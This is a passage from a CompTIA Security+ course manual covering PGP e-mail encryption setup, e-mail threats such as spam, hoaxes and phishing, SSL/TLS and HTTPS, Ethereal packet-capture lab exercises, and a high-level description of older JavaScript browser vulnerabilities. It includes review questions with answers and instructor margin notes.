 key between students              • Importing public keys
 and to send encrypted
 e-mail using Outlook          The first step is to install and configure PGP on your workstation. PGP can be
 Express. Hotmail,             downloaded free from the International PGP Home Page
 Yahoo, and other free
 e-mail providers, no          (www.pgp.com/downloads/desktoptrial.html). To save you some time and
 longer support                protect your privacy, your instructor has already downloaded the software for you. After
 managing their mail           you've installed PGP, a wizard starts to guide you through the initial setup steps,
 through Outlook               including generating a PGP key.
 Express using their
 free e-mail accounts.


Do it!                         B-3:    Installing and configuring PGP
                                Here’s how
See the classroom setup          1 Download the PGP software              According to your Instructor’s directions.
instructions for location of
the download file.
                                 2 Extract the zipped file to
                                    C:\Security

                                    Open C:\Security

                                 3 Run the                                To start the installation.
                                    PGPDesktop902_Inner
                                    program

                                    Click English

                                 4 Select I accept the license
                                    agreement

                                 5 Click Next

                                 6 Click Next                             The file copy starts.

                                 7 Click Yes                              To restart your computer.

                                 8 Log in as Administrator                The PGP Setup Assistant starts automatically.

                                 9 Click Next

                                10 Enter user information in the          Enter Student## for Name, Class for
                                   fields provided and then click         Organization and a fictional e-mail address.
                                    Next
5–22           CompTIA Security+ Certification

Do not have students           11 Select Use without a license      The functionality necessary for the PGP-related
enter the evaluation              and disable most                  activities will still be available.
license you received with
the download. If you do,          functionality
all but the first student to
enter and submit the              Click Next
license number will
receive an error message       12 Click Next
when trying to license the
program.
                               13 Click Next                        To accept the default of I am a new user.

                               14 Click Next                        To specify that you want to generate a PGP key.

                               15 Enter Student## and a fictional
                                  Yahoo e-mail address

                                  Click Next

                               16 Check Show Keystrokes             To view your keystrokes.

                                  Enter a passphrase                A longer passphrase is desirable for security
                                                                    reasons

                                  Reenter the passphrase            To confirm.

                               17 Click Next                        To generate the key.

                               18 Click Next

                               19 Click Next                        To accept the default of automatically detecting
                                                                    e-mail accounts.

                               20 Click Next                        To accept the default outgoing e-mail policies.

                               21 Click Finish
                                                                                                         E-mail         5–23

                              Export and import public keys
Explanation                   PGP makes this process very easy by allowing you to export your public key to a text
                              file. You can then send the public key to the person who needs to send you encrypted
                              data.
                              Once the person receives the key, they can import it into PGP. After that, they can send
                              you encrypted messages.

Do it!                        B-4:    Exporting and importing the public key
                               Here’s how                                Here’s why
                               1 Launch PGP                              (If necessary.) Click Start, then choose All
                                                                         Programs, PGP, PGP Desktop.

                                  Right-click Student##

                               2 Choose Export...

Make sure students have        3 Save the file to a removable media      Save the file to the removable media with which
removable media                  device using the default file name      your instructor has provided you.
available on which to save
the exported file.
                               4 Give the removable media to your
                                 partner

                               5 Insert your partner's removable media
                                 into the appropriate drive or port

                               6 Choose File, Import…

                               7 Navigate to the removable media

                                  Select Student##.asc

                                  Click Open

Due to an incompatibility      8 Click Import                            The key is imported to PGP.
between PGP and
Network Monitor (which is
used in the unit on            9 Close PGP
transmission and storage
media) in Windows Server      10 Click Start and then choose
2003, students have to            Control Panel, Add or
uninstall PGP when                Remove Programs
finished with activity B-4.
                              11 Select PGP Desktop, then click          To start the process of uninstalling PGP. This is
                                  Remove                                 necessary due to an incompatibility between
                                                                         PGP and Network Monitor (which is used in the
                                                                         unit on transmission and storage media) in
                                                                         Windows Server 2003.

                              12 Follow the prompts to uninstall
                                 the program and then reboot the
                                 computer
5–24          CompTIA Security+ Certification


Topic C: E-mail vulnerabilities
                         This topic covers the following CompTIA Security+ exam objective:

                          #      Objective

                          2.2    Recognize and understand the administration of the following e-mail security concepts
                                    • Vulnerabilities
                                       • SPAM
                                       • Hoaxes




                         Vulnerabilities
Explanation              E-mail has an incredible number of vulnerabilities; moreover, because it’s the one
                         electronic tool that almost everyone uses, e-mail is attacked frequently. As
                         demonstrated so far, a large number of e-mail vulnerabilities can be addressed using a
                         combination of best practices, virus-scanning software, and secure e-mail. The table
                         below outlines the more common e-mail vulnerabilities and countermeasures for each:

                          Attack                        Vulnerability                           Solution

                          Eavesdropping                 Lack of confidentiality; because e-     E-mail encryption for
                                                        mail is sent in clear text, it can be   communications that require
                                                        read in transit.                        confidentiality.

                                                                                                Encrypted messages cannot be
                                                                                                effectively scanned for viruses until
                                                                                                they reach the desktop and are
                                                                                                decrypted.

                          Spoofing and                  Lack of authentication; dummy e-        Digital certificates issued by a
                          masquerading                  mail accounts can be set up to pose     trusted certificate authority prove to
                                                        as trusted businesses and trick users   the customer that the sender of an e-
                                                        into giving over credit card numbers    mail really is who he or she says it
                                                        and other types of information.         is.

                          Man-in-the-middle attack,     Lack of authentication; by tricking     By digitally signing their data, the
                          session hijacking             e-mail servers to send their data       two parties can authenticate each
                                                        through a third node, an attacker can   other and be sure of the sender’s
                                                        pose as one or both people in an e-     identity; they also gain the same
                                                        mail exchange.                          certainty by encrypting their e-mails.

                          Data manipulation             Lack of integrity; because e-mail       E-mail encryption stops both the
                                                        data is sent as plaintext, it can be    reading and manipulation of e-mails;
                                                        modified or changed in transit.         digital signatures on e-mails ensure
                                                                                                that if the data is changed in
                                                                                                transmission, the recipient will
                                                                                                know.

                          Malware                       Malicious software; viruses, Trojan     Virus filtering software on desktops,
                                                        horses, backdoors, and worms can        servers, and Internet gateways.
                                                        spread through e-mail, destroy data,
                                                        and be part of a DoS attack on e-
                                                        mail servers.
                                                                                  E-mail       5–25

 Attack                   Vulnerability                          Solution

 Social engineering       Repudiation; because a variety of e-   E-mail encryption and digital
                          mail attacks are possible, users can   signatures provide nonrepudiation,
                          claim they did not send a given        because the sender must have their
                          message.                               own digital certificate and
                                                                 passphrase to use them.

 Password guessing        A wide variety of password guessing    Choose a strong passphrase for your
                          attacks can be used against a PGP      certificate or key.
                          key or X.509 digital certificate.

 Information leaks        Users can send sensitive company       Train users on acceptable use of e-
                          data to other untrusted networks or    mail; use an e-mail content filtering
                          to untrusted parties.                  solution.




Spam
Spam is defined as the act of flooding the Internet with many copies of the same
message in an attempt to force the message on people who would not otherwise choose
to receive it. Most spam is commercial advertising, often for dubious products and get-
rich-quick schemes. Spam costs the sender very little to send, as most of the costs are
paid for by the recipient or the carriers, rather than by the sender.

E-mail spam
E-mail spam targets individual users with direct mail messages. E-mail spam lists are
often created by scanning Usenet postings, stealing Internet mailing lists, or searching
the Web for addresses. On top of that, it costs money for ISPs and online services to
transmit spam, and these costs are transmitted directly to subscribers.
One particularly nasty variant of e-mail spam is when it is sent to mailing lists (public or
private e-mail discussion forums). Many mailing lists limit activity to their subscribers,
spammers use automated tools to subscribe to as many mailing lists as possible so they
can grab the lists of addresses, or use the mailing list as a direct target for their attacks.

Hoaxes and chain letters
A form of social engineering, like Trojan horses, e-mail hoaxes and chain letters are e-
mail messages with content that is designed to get the reader to spread them. Unlike
Trojans, these messages do not carry a malicious payload. However, the messages they
contain are usually untrue or describe a situation that was resolved long ago. Hoaxes try
to get their victim to pass them on using several different methods, including:
    • Appearing to be an authority in order to exploit people’s natural trust
    • Generating excitement about being involved
    • Creating a sense of importance or belonging by passing along information
    • Playing on people’s gullibility or greed
5–26   CompTIA Security+ Certification


                  Although one might not think of chain letters as an attack on an organization, they in
                  fact can cause as much damage as a virus if enough people take the time to read and
                  forward the message. First, there is the lost productivity of the people who read and
                  forward the message. You might think, “It only took me a minute to read the message;
                  therefore, the impact must be insignificant.” If you received the message, then you are
                  likely to be one of a group of ten people who all wasted a minute to read the message.
                  Worse, if those ten people forward the hoax onto another ten people each, then the
                  cumulative amount of time lost is about 100 minutes. It doesn’t take very long for all the
                  minutes to add up. Exhibit 5-7 illustrates just how fast the costs can mount.
                  There are even more costs. When a gullible user sends a message such as the Nuclear
                  Strike hoax, as shown in Exhibit 5-8, what is the cost to your organization’s reputation?




                  Exhibit 5-7: What hoaxes and chain letters really cost
                                                                          E-mail     5–27




Exhibit 5-8: Nuclear strike hoax

It’s likely your company’s reputation would be damaged, if not by the fact that your
employees were sent on such an embarrassingly obvious hoax, then by the fact that your
employees wasted the time of others with it. Finally, hoaxes that are fake warnings of
viruses cause users to take a relaxing attitude toward virus warnings. When a message
comes about a real and destructive virus, will your users believe it?

Phishing
Another scam closely related to hoaxes is phishing. This involves the perpetrator
sending e-mail to users and claiming to be a well-known company. The scammer tries
to get users to divulge personal information such as bank account, social security, and
other personal information. Some of the more well-known companies that have been
impersonated are eBay and PayPal. An example of the e-mail that you might receive
can be found at www.millersmiles.co.uk/identitytheft/latest-paypal-e-
mail-hoax.htm.
The e-mail often directs you to a site that appears to be legitimate. It has the look-and-
feel of the official Web site for the company they are impersonating. If you are asked
for personal information, check with the company to determine whether they actually
sent you the e-mail and check one of the hoax listing sites to see if it is a known scam.
5–28   CompTIA Security+ Certification

                  Countermeasures for hoaxes
                  Although there are a number of e-mail content filtering solutions that help to mitigate
                  the effect of hoaxes and e-mail chains, the most effective and basic countermeasures are
                  an effective security awareness campaign coupled with a good e-mail policy. Here are
                  some guidelines:
                      • Create a policy and train users on what they should do when they receive a virus
                        warning. Typically, the only action they should take is to update the virus
                        definitions on their own machine. They should not forward the warning on to
                        others.
                      • Establish that the intranet site is the only authoritative source for advice on virus
                        warnings.
                      • Ensure that the intranet site displays virus and hoax information on the home
                        page and is consistently updated. For example: “The Nuclear Strike warning
                        message has been declared a hoax. Anybody receiving this warning should
                        discard it. Remember, when receiving e-mail you should never open attachments
                        that are not expected.”
                      • Inform users that if the virus warning is not listed on the intranet site, they are to
                        forward the warning to a designated account.
                      • Check one of the sites that list hoaxes and other urban legends before acting on
                        or forwarding a suspect e-mail. Examples of such sites include snopes.com,
                        hoaxbusters.ciac.org/, and any of the companies that provide anti-virus
                        software.
                                                                                       E-mail   5–29

Do it!   C-1:   Discussing e-mail vulnerabilities
          Questions and answers
          1 What is the best way to prevent man-in-the-middle or session hijacking attacks
            against e-mail?

            Parties should encrypt their e-mail and digitally sign their data.

          2 What is the best way to protect against virus attacks attached to e-mails?
            • Use antivirus software on workstations, servers, and Internet gateways
            • Train users about safeguards when opening e-mail

          3 What is the best way to protect data from manipulation?

            Encrypt and digitally sign the e-mail

          4 How are e-mail spam lists created?
            A    Scanning Usenet postings
            B    Stealing internet mailing list
            C    Searching the Web for addresses
            D    All of the above

          5 Hoaxes try to get users to pass a hoax along using which method below?
            A    Generating excitement about being involved
            B    Playing on people’s gullibility or greed
            C    Creating a sense of importance or belonging
            D    Appearing to be an authority

          6 What is a good countermeasure for hoaxes? (Choose all that apply.)
            A    Create a policy and train users.
            B    Inform users to forward the warning if nothing is posted on the intranet site.
            C    Establish the Internet site as the only authoritative source for advice on virus
                 warnings.
            D    All of the above.
5–30      CompTIA Security+ Certification


Unit summary: E-mail
Topic A              In this topic, you learned how cryptography is used to secure e-mails across insecure
                     networks. You also learned the key cryptography concepts of encryption, digital
                     signatures, and digital certificates, and how encryption methods can be combined to
                     obtain hybrid cryptosystems.
Topic B              In this topic, you learned about two encryption technologies—PGP and S/MIME. You
                     discussed that PGP is the current de facto e-mail encryption standard and S/MIME is the
                     emerging standard in e-mail encryption. You also discussed the differences between
                     PGP and S/MIME.
Topic C              In this topic, you learned that spam is a major detriment to corporate and personal e-
                     mail systems. You learned how hoaxes and e-mail chain letters can be quite damaging.
                     You also discussed how they can be combated using best practices in security
                     awareness training and e-mail content filtering software.

                     Review questions
                       1 Encryption is accomplished by taking data and passing it, along with a value, called
                         a key, through an algorithm that makes the data completely unreadable. True or
                         false?
                         True

                       2 3DES is much faster than either IDEA or CAST. True or false?
                         False: It is actually much slower.

                       3 Electronic signatures are created by using a hash function. True or false?
                         True

                       4 The private key is used for decryption and is kept secret. The public key is used for
                         encryption and is freely distributed to anyone who needs or wants it. True or false?
                         True

                       5 Digital certificates consist of which of the following?
                         A The owner’s public key, which is used to encrypt messages to its owner.
                         B One or more pieces of information that uniquely identify the owner (for
                           example, a name and e-mail address).
                         C Electronic signatures of a signee.
                         D Digital signature of the endorser, stating that the public key actually belongs to
                           the person in question.
                         E   All of the above
                                                                      E-mail    5–31

 6 What size key (in bits) does IDEA use?
   A 24
   B 58
   C 56
   D   128

   E 256
 7 What does IDEA stand for?
   A Internal Data Encryption Algorithm
   B   International Data Encryption Algorithm

   C International Digital Encryption Algorithm
   D Internal Digital Encryption Algorithm
 8 What sizes keys (in bits) does Twofish have?
   A   128

   B   192
   C 195
   D   256
   E 500
 9 What does MD5 stand for?
   A   Message Digest v 5
   B Message Digital 5
   C Message Digitalization 5
   D Mixed Digest Standard 5
10 How many digital signatures does X.509 support to attest to the key’s validity?
   A 0
   B   1

   C Multiple
11 Public key encryption allows the symmetrical key to be distributed encrypted along
   with the __________ text.
   cipher

12 The result of a hash function is a __________ ____________.
   message digest
5–32   CompTIA Security+ Certification

                  13 X.509 is the standard for digital signatures. True or false?
                      False: It is a standard for digital certificates.

                  14 Conventional encryption is normally slower than public key encryption. True or
                     false?
                      False: It is actually about 1000 times faster.

                  15 When encrypting e-mail, ____________ encryption provides the ability to compress
                     the message before encryption takes place.
                      PGP

                  16 The ______________ encryption algorithm is considered the industry standard
                     encryption algorithm today.
                      3DES

                  17 PGP uses X.509 digital certificates. True or false?
                      False: It uses PGP certificates.
                                                         6–1


Unit 6
Web security
               Unit time: 120 minutes

               Complete this unit, and you’ll know how to:

               A Describe the SSL/TLS and HTTPS
                  protocols.

               B Discuss the vulnerabilities associated with
                  JavaScript, buffer overflow, ActiveX,
                  cookies, CGI, applets, SMTP relay, and
                  how they are commonly exploited.

               C Configure Internet Explorer security.
6–2         CompTIA Security+ Certification


Topic A: SSL/TLS protocol
                          This topic covers the following CompTIA Security+ exam objectives:

                           #         Objective

                           2.3       Recognize and understand the administration of the following Internet security concepts
                                       • SSL/TLS (Secure Sockets Layer / Transport Layer Security)
                                       • HTTP/S (Hypertext Transfer Protocol / Hypertext Transfer Protocol over Secure Sockets
                                         Layer)

                           2.4       Recognize and understand the administration of the following directory security concepts
                                       • SSL/TLS (Secure Sockets Layer / Transport Layer Security)

                           4.3       Understand and be able to explain the following concepts of PKI (Public Key Infrastructure)
                                       • Certificates




                          Transport protocols
Explanation               The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are commonly
                          used protocols for managing the security of a message transmitted across the Internet.
                          Developed by Netscape, SSL is also supported by Microsoft and other Internet
                          client/server developers. SSL is included as part of both the Microsoft and Netscape
                          browsers and most Web server products. It has become the de facto standard. TLS is
                          essentially the latest version of SSL, but it is not as widely available in browsers.
                          The SSL/TLS protocol runs between the Transport and Application layers, as shown in
                          Exhibit 6-1. SSL/TLS uses TCP/IP on behalf of the higher-level protocols and allows an
                          SSL-enabled server to authenticate itself to an SSL-enabled client, the client to
                          authenticate itself to the server, and both machines to establish an encrypted connection.


                                  TCP/IP                              TC/IP protocol
                                    d l                                 it
Review the TCP/IP
networking model before          Application Layer

explaining that SSL/TLS                              Telnet     FTP       SMTP      DNS        RIP     SNMP
runs on top of TCP.
SSL/TLS is                                                      SSL/TLS
encapsulated in a TCP
header. Explain that
SSL/TLS would be a               Transport Layer                TCP                            UDP

sub-layer between the
Transport layer and the                                                                              ICMP
Application layer                 Internet Layer                      Internet Protocol (IP)

protocols.
                                                                                     Frame
                                 Network Interface   Ethernet          PPP                            ATM
                                                                                     Relay




                          Exhibit 6-1: Secure Sockets Layer Protocol
                                                                             Web security       6–3

         Security mechanisms
         SSL/TLS uses ciphers, which enable the encryption of data between two parties, and
         digital certificates, which provide the authentication of the end points for end-to-end
         secure communication.

         Ciphers
         There are two encryption (cipher) types used by SSL/TLS: symmetric encryption (secret
         key encryption) and asymmetric encryption (public key encryption). Used alone, both
         ciphers have their shortcomings. Symmetric encryption can be secure only if the shared
         secret key is securely exchanged. It raises the problem of how to exchange a secret key
         across the Internet, because the reason for using encryption in the first place is due to
         the insecure nature of the Internet. Asymmetric encryption solves the problem of
         securely sharing keys over the Internet, but it requires longer processing times because
         of the complexity of the algorithm.
         SSL as well as TLS work around these limitations by using both types of ciphers, first
         using an asymmetric cipher to securely exchange the shared secret key and then using
         the secret key to transfer the data. One of the parties picks a random secret key and
         encrypts it with the other end point device’s public key. The encrypted key is then sent
         to the other party where it is decrypted using the private key known only to itself. No
         one else can decrypt the secret key because no one else has the private key. After the
         secret key is identified by each end point, the parties can then use this shared key for
         standard key encryption, which can be performed quickly.
         Along with the type of cipher being used, the cipher size or strength also plays a role in
         secure transactions. Commonly found 40- and 56-bit Web browsers are considered to
         have weak encryption because these key sizes can be cracked in a short time period
         (approximately one week) using commonly available processing power. These weakly
         encrypted browsers are common because of the U.S. regulations on exportation of
         strong encryption. It’s expected these weak browsers will become less common with the
         recent changes in regulations made by the U.S. government.
         Ciphers using 128-bit keys provide a much higher level of protection. Some SSL/TLS-
         enabled Web servers require the browser to support 128-bit ciphers to establish a
         connection.

Do it!   A-1:     Determining the browser’s cipher strength
          Here’s how                                 Here’s why
           1 Log on as Administrator

           2 Open Internet Explorer                  To determine what key size is currently enabled
                                                     on your browser.

           3 Choose Help, About Internet             The heading called “Cipher Strength” specifies
              Explorer                               the key size.

                                                     If you don’t have 128-bit encryption, you can
                                                     click on the Update Information link to the
                                                     right of the “Cipher Strength” heading to
                                                     download the 128-bit encryption software.
6–4       CompTIA Security+ Certification

                     Digital certificates
Explanation          Digital certificates enable authentication of the parties involved in a secure transaction.
                     A typical certificate has the following components:
                         • The certificate issuer’s name
                         • The entity for which the certificate is being issued (also called the “subject”)
                         • The public key of the subject
                         • Time stamp
                     Certificates are typically issued by certificate authorities (CA) that act as a trusted third
                     party. Certificates can be considered a standard way of binding a public key to a name,
                     verifying the identity of the parties involved. Certificates prevent users from
                     impersonating other parties.
                     There are two distinct types of certificate authorities that issue digital certificates:
                         • Public certificate authorities, such as VeriSign, are recognized as trusted by most
                           Web browsers and servers. A certificate issued by a public CA is usually used
                           when no other relation exists between two parties.
                         • Private certificate authorities are established in-house by enterprises that need to
                           create their own closed, private certificate infrastructure.
                                                                                              Web security       6–5

Do it!                       A-2:   Installing Ethereal to be able to analyze SSL packets
                              Here’s how                              Here’s why
Explain to students that      1 Download the ethereal-setup-          Your instructor will advise you on the download
Ethereal is used to             0.10.12.exe file to                   steps.
examine data from a live
network via an Ethernet         C:\Security
interface, and there are
four main tasks to perform    2 Download the WinPcap auto-            Your instructor will advise you on the download
in this activity.               installer program to                  steps.
                                C:\Security

                              3 Open C:\Security                      To install WinPcap.

                              4 Double-click the                      To run the auto-install program.
                                WinPcap_3_1.exe file

                                Accept all defaults and the user
                                agreement

                                After the installation is complete,
                                restart the computer

                              5 Log in as Administrator

                              6 Open C:\Security                      To install Ethereal.

                                Double-click the
                                Ethereal-setup-0.10.12 file

                                Accept the license agreement and
                                all defaults

                              7 Check Run Ethereal 0.10.12            To launch Ethereal.
                                and click Finish
6–6           CompTIA Security+ Certification

                         Encryption and online banking
Explanation              Although many different types of sites require encryption of data that travels over the
                         Internet, banks clearly have a strong interest. NetBank was one of the first FDIC-
                         insured banks with accounts that can be fully managed over the Internet. With all of the
                         potential vulnerabilities present on the Internet, all account activity is encrypted using
                         SSL. You’ll observe encrypted and non-encrypted interactions using Ethereal.

Do it!                   A-3:     Configuring Ethereal and capturing a Web session
                           Here’s how                                Here’s why
                            1 Launch a Web browser

                               Go to http://www.netbank.com

                            2 Return to the open Ethereal
                              Program

                            3 Choose Capture, Options…

                            4 Click the pull-down Interface
                              menu

                               Choose the interface that’s           You might have only one interface listed.
                               connected to your Ethernet
                               network

                            5 Clear Capture packets in
                               Promiscuous mode

                            6 Check the three Name
                              Resolution selections




                               Click Start                           After completing the configuration to begin
                                                                     capturing packets.

                            7 Return to the browser

                               Refresh the page that’s already       Wait until the refresh is finished.
                               loaded
                                                           Web security       6–7

8 Return to the Ethereal Capture
  window




                                   You'll see information about captured packets.

  Click Stop                       The Ethereal Network Analyzer window
                                   displays.

9 Maximize the Ethereal Network
  Analyzer window
6–8           CompTIA Security+ Certification

                         Working with Ethereal's capture output
Explanation              After you run the Ethereal Capture program, you'll need to analyze the information it
                         captured. You do this in the Ethereal Network Analyzer window, which is divided into
                         several panes of information.

Do it!                   A-4:     Reviewing decoded packets in plaintext
                           Here’s how                              Here’s why
                            1 Review the records in the top pane

                            2 Click on the first record with
                              HTTP as the Protocol and GET as
                              the first word of the Info field

                               Review the information in the       This shows information about the protocols used
                               middle pane                         to refresh this page.

                            3 Click on any entry in the middle     You will see the equivalent data highlighted in
                              pane                                 the bottom pane. This is the actual data, coded in
                                                                   hexadecimal and ASCII format.

                            4 Expand Internet Protocol             In the middle pane.

                               Locate the source and destination   Record the entries below:
                               addresses
                                                                   Source: ___________________________

                                                                   Destination: _______________________

                            5 Expand Transmission                  (In the middle pane.)
                               Control Protocol

                               Locate the source and destination   Record the entries below:
                               ports and the next sequence
                               number                              Source: _______________________________

                                                                   Destination: ___________________________

                                                                   Next sequence number: __________________

                            6 Expand the Hypertext                 In the middle pane.
                              Transfer Protocol entry

                               Locate the Host entry and click     The hostname is selected in the bottom pane as
                               on it                               well. This should be readable as ASCII text.

                            7 Return to the top pane and review    All HTTP data should be readable in the bottom
                              the information for several of the   pane. Make sure you select the Hypertext
                              other HTTP packets with a            Transfer Protocol in the middle pane first.
                              destination of your local computer
                                                                                                Web security      6–9

                           Analyzing SSL sessions
Explanation                You can also use Ethereal to analyze secure SSL sessions, such as a session with an
                           online banking institution.

Do it!                     A-5:     Analyzing an SSL session
                            Here’s how                                Here’s why
                             1 In the Netbank browser window,
                               click Account Login
                                                                      To access Web page using SSL.

                             2 Check In the future, do not            If prompted by a Security Alert message.
                               show this warning and click
                                OK

      Make sure students     3 Enter your first and last names as
do not click Login.            the User ID and Password,
                               respectively, but don’t click Login

                             4 Return to Ethereal and choose
                                Capture, Start

                                Click Continue without                To begin a new capture.
                                Saving

                             5 In the browser, click Login            If you're prompted by AutoComplete, specify to
                                                                      not offer to remember passwords, and click No.

                                When the page finishes loading
                                with an error, stop the Ethereal
                                Capture

                             6 In the Ethereal Network Analyzer       These are the three-way handshake between
                               window, review the first three         your host and the server to establish the
                               TCP packets by clicking on them        connection.
                               in the top pane

                             7 Find the following entries in the
                               top pane and review the Secure
                               Socket Layer content of these
                               frames in the middle pane

                                •   SSL Client Hello                  The first three entries describe the negotiation
                                •   Server Hello                      for and exchange of ciphers. The Application
                                                                      Data entry contains the transmission of the
                                •   Change Cipher Spec
                                                                      HTML data. Notice that you can no longer read
                                •   Application Data                  the HTML script in the bottom pane due to the
                                                                      SSL encryption.

                             8 Close Ethereal
6–10     CompTIA Security+ Certification

Do it!              A-6:      Reviewing SSL and TLS
                      Questions and answers
                       1 Where does the SSL/TLS protocol fit within the TCP/IP protocol stack?
                          A      At the Network layer
                          B      At the Physical layer
                          C      Between the Data Link layer and the Network layer
                          D      Between the Transport layer and the Application layer

                       2 What are the two encryption types used by SSL and TLS?

                          Asymmetric (public key) and symmetric (secret key)

                       3 How does SSL/TLS use both asymmetric and symmetric ciphers?

                          It encrypts the data with a secret key, and then encrypts the secret key using the asymmetric
                          cipher. It then transmits both to the receiver. The receiver uses the private key to decrypt the
                          secret key, and then uses the secret key to decrypt the data.

                       4 Which of the following cannot be found in a digital certificate?
                          A      Certificate issuer’s name
                          B      Entity for whom the certificate is being issued
                          C      Public key of the certificate authority
                          D      Time stamp

                       5 Public certificate authorities are used when no other relation exists between two
                         parties. True or false?

                          True
                                                                                                 Web security      6–11

                          Implementation using HTTPS
Explanation               The Hypertext Transfer Protocol over SSL (HTTPS) is a communications protocol
                          developed by Netscape to transfer encrypted information between computers over the
                          World Wide Web. HTTPS is essentially a variation of HTTP, the commonly used
                          Internet protocol, which uses SSL encryption for security.
                          Most implementations of the HTTPS protocol are used to enable online purchasing or
                          the exchange of private information and resources over insecure networks. Accessing a
                          secure server often requires some sort of registration, login, or purchase.
                          After a digital certificate is installed on a secure server, a client is able to connect to the
                          server using the HTTPS protocol on an SSL-enabled Web browser such as Netscape
                          Navigator or Microsoft Internet Explorer. Any file that is transmitted from the server to
                          a client with a Web browser using the HTTPS protocol is considered secure.
                          The following steps outline how HTTP combines with SSL to enable secure
                          communication between a client and a server:
As an exercise, have         1 By accessing a URL with HTTPS, the client requests a secure transaction and
students draw a                  informs the server about the encryption algorithms and key sizes that it supports.
flowchart of sorts that
describes the process        2 The server sends the requested server certificate, which contains the server’s
and the decisions that           public key that has been signed by a CA. The CA is considered a trusted party
occur during the                 with a public key available to all clients. The CA also sends a list of supported
process—this should              ciphers and key sizes in order of priority.
help them understand
how the public and           3 The client then generates a new secret symmetric session key based on the
secret keys are used.            priority list sent by the server. The client also compares the CA that issued the
                                 certificate to its list of trusted Cas, verifies the certificate has not expired, and
                                 confirms the certificate belongs to the server intended for communication.
                             4 After the validity of the certificate has been confirmed, the client encrypts a copy
                                 of the new session key it generated with the public key of the server obtained
                                 from the certificate. The client then sends the new encrypted key to the server.
                             5 The server decrypts the new session key with its own private key. Upon
                                 completion of this step, both the client and server have the same secret session
                                 key that can now be used to secure further communication and data transport.
                          When accessing a secure Web site using SSL, the location bar on the browser will show
                          https instead of http and the padlock icon will appear closed on the status bar of the
                          browser.
                          Only the URL using the HTTPS protocol is considered secure, therefore, all pages that
                          need to be transferred in a secure mode need to utilize HTTPS.
6–12          CompTIA Security+ Certification

                         Viewing certificates
Explanation              You can view certificates by double-clicking the padlock icon in the browser's status
                         bar. The General tab provides general information about the certificate, such as to
                         whom the certificate was issued, who it was issued by, and when it's valid. The Details
                         tab provides you with more detailed information, including:
                             • Version — The version of X.509 used to create the certificate.
                             • Serial Number — The unique serial number for the certificate.
                             • Signature Algorithm — The encryption algorithm used to create the
                               certificate’s signature.
                             • Issuer — The issuer of the certificate.
                             • Valid From — The date from which the certificate is valid.
                             • Valid To — The date after which the certificate expires.
                             • Subject — Used to establish the certificate holder, which typically includes the
                               identification and geographic information.
                             • Public Key — The certificate’s encrypted public key.
                             • Thumbprint Algorithm — The encryption algorithm used to create the
                               certificate’s thumbprint.
                             • Thumbprint — The encrypted thumbprint of the signature (for example,
                               message digest).
                             • Friendly Name — The descriptive name assigned to the certificate.

Do it!                   A-7:     Viewing the SSL certificate
                           Here’s how                               Here’s why
                            1 In your browser, return to the
                              Netbank login page

                            2 Double-click the SSL icon             (The padlock icon in the status bar.)




                               Review the general certificate information
                                                        Web security       6–13

3 Activate the Details tab




4 Click each field             To view detailed certificate information.

5 Activate the Certification
  Path tab




6 Select the CA                (If necessary.)

7 Click View Certificate       To view the certificate of the CA.

8 Click OK                     To close the certificate information.
6–14     CompTIA Security+ Certification

Do it!              A-8:      Discussing HTTPS
                      Questions and answers
                       1 Return to the https://secure.nhetbank.com/login.htm.

                          When does this certificate expire?

                          (Answers will vary.) As of this book’s printing, 5/24/2006.

                       2 What algorithm was used to create the message digest?

                          sha1

                       3 What algorithm was used to sign the certificate?

                          sha1RSA

                       4 How does the browser indicate whether an HTTPS page is displayed?

                          The location bar on the browser will show https instead of http, and the padlock icon will
                          appear closed on the status bar of the browser.

                       5 The client generates a secret session key based on the _______________ sent by
                         the server.

                          Priority list

                       6 The client encrypts a copy of the new session key it generated with the public key
                         of the server obtained from the certificate. True or false?

                          True
                                                                                             Web security        6–15


Topic B: Vulnerabilities of Web tools
              This topic covers the following CompTIA Security+ exam objective:

               #       Objective

               2.3     Recognize and understand the administration of the following Internet security concepts
                        • Vulnerabilities
                            • Java Script
                            • ActiveX
                            • Buffer Overflows
                            • Cookies
                            • Signed Applets
                            • CGI (Common Gateway Interface)
                            • SMTP (Simple Mail Transfer Protocol) Relay




              Web application security
Explanation   With the rising complexity of Web and multimedia applications, online business tools
              and information sources are becoming more vulnerable to outside threats. Any
              combination of increasingly complex code, ineffective development schedules, lack of
              quality assurance, and unskilled personnel can lead to serious security loopholes. For
              many corporations, security of Web applications and online services is as critical an
              issue as their intended functionality.

              JavaScript
              JavaScript is a scripting language developed by Netscape to enable Web authors to
              design interactive sites. JavaScript code is typically embedded into an HTML document
              and placed somewhere between the <head> and </head> tags. The HTML tags that
              indicate the beginning and ending of JavaScript code are <script> and </script>. It’s
              possible to have multiple blocks of code within an HTML page, as long as they are
              surrounded by the aforementioned tags. One could also make a reference to an external
              JavaScript code instead of inserting the actual code within the body of the HTML code.
              A typical example of JavaScript code within an HTML document is as follows:
                     <html>
                     <head>
                     <title>Example JavaScript</title>
                     <script language="JavaScript">
                     document.writeln("Example");
                     </script>
                     </head>
                     <body>
                     .
                     .
                     </body>
                     </html>
6–16   CompTIA Security+ Certification

                  Many Web browsers support the ability to download JavaScript programs with an
                  HTML page and execute them within the browser. Such programs are often used to
                  interact with the client or browser user and transmit information back to the Web server
                  that provided the page. These programs can also perform tasks outside of the user’s
                  control such as changing a default Web page or sending an e-mail out to a distribution
                  list.

                  Vulnerabilities
                  JavaScript programs are executed based on the intended functionality and security
                  context of the Web page with which they were downloaded. Such programs have
                  restricted access to other resources within the browser. Security loopholes exist in
                  certain Web browsers that permit JavaScript programs to monitor a client’s (browser’s)
                  activities beyond its intended purpose. The execution of such programs and passing of
                  information between the server and browser or client usually takes place without the
                  knowledge of the client. Malicious JavaScript programs can even make their way
                  through firewalls, which lack the configuration parameters to prevent such activities.
                  Some of the documented security holes associated with JavaScript on various browsers
                  are:
                      • Monitoring Web browsing — The CERT Coordination Center unveiled
                        JavaScript vulnerabilities that allow an attacker to monitor the browsing
                        activities of a user even when visiting a secure (HTTPS) Web page and behind a
                        firewall. This information includes the URL addresses of browsed pages and
                        cookies downloaded to client machines by the visited Web servers.
                      • Reading password and other system files — JavaScript implementation of
                        Netscape versions 4.04 through 4.74 allows a JavaScript imbedded into an
                        HTML code to read sensitive files (including system password files) and
                        transmit them back to the owner of the page. A similar vulnerability is inherent
                        in the Microsoft Internet Explorer 4.0-4.01.
                      • Reading browser’s preferences — Certain versions of Netscape allow an
                        imbedded JavaScript to access the “preferences” file, which contains
                        information such as e-mail servers, mailbox files, e-mail addresses, and even e-
                        mail passwords.

                  Safeguards
